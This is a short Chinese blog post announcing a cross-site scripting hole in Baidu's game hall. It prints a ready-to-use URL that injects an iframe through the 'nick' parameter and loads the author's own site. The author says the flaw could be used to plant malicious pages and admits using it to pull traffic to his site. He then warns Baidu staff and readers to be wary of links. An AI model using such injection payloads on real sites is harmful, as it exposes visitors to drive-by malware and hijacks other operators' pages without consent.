百度游戏大厅爆跨站漏洞

今天百度游戏大厅爆出跨站漏洞!并且可以挂马利用···

跨站代码

http://yx.baidu.com/Hall/game/rank_fxq.asp?nick=%3E%3C/a%3E%3Ciframe%20src=%22http://www.kainy.cn%22%20width=500%20height=600%3E%3C/iframe%3E%3Ca%20href
效果图:

Kainy自认为是小人,利用本漏洞给小站带来些许热闹,嘿嘿。。。

不过话说回来,骗点流量还算厚道了,没给你添个挂马的页面,呼呼。。。 百度工作人员要注意啦。。 大家今后面对链接也要注意咯,别看是大站点的就放松了警惕哦~!

分享到:

评论完整模式加载中...如果长时间无法加载,请针对 disq.us | disquscdn.com | disqus.com 启用代理